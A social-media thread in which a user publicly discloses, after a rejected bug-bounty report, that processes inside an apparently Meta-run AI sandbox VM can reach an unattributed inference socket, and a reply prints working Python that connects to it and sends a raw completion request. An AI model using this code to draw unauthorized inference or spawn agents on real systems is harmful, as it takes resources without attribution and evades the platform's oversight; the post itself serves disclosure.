Elektrine lite

← Feed

@jonny@neuromatch.social

2026-09-29 05:21 UTC

RE: https://neuromatch.social/@jonny/117339825958098508 OK! Meta evaluated this as intended behavior, not applicable for a bug bounty, so therefore responsible disclosure no longer applies so here goes: any process run within the VM can access the socket that provides inference with no attribution mechanism. This includes raw inference  with arbitrary system and user prompts, as well as the ability to spawn agents with a toolset labeled as being for the "spaces" feature, which we will come back to. This amounts to a horizontally contagious token and information harvesting bug being labeled as intended behavior. Splitting details into new thread below

Replies (1)

  • @jonny@neuromatch.social 2026-09-29 05:36

    here's the MWE for plain inference as plaintext and highlighted picture of text: import json, socket, struct, uuid SOCK = "/run/hatch/sandbox/space-inference.sock" def call(req, timeout=60): payload = json.dumps(req).encode() s = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) s.settimeout(timeout) s.connect(SOCK) s.sendall(struct.pack(">I", len(payload)) + payload) (n,) = struct.unpack(">I", s.recv(4)) body = b"" while len(body) < n: chunk = s.recv(n - len(body)) if not chunk: raise RuntimeError("truncated response") body += chunk s.close() return json.loads(body) resp = call({ "kind": "complete", "request_id": f"mwe-{uuid.uuid4().hex[:8]}", "slug": "__mwe__", "system": "Always answer in exactly three words.", "prompt": "What is the capital of France?", "json_schema": { "type": "object", "properties": {"reply": {"type": "string"}}, "required": ["reply"], "additionalProperties": False, }, }) print(resp["ok"]) print(resp["result"]["content"]) print(resp["result"].get("usage"))

    Open ##4893202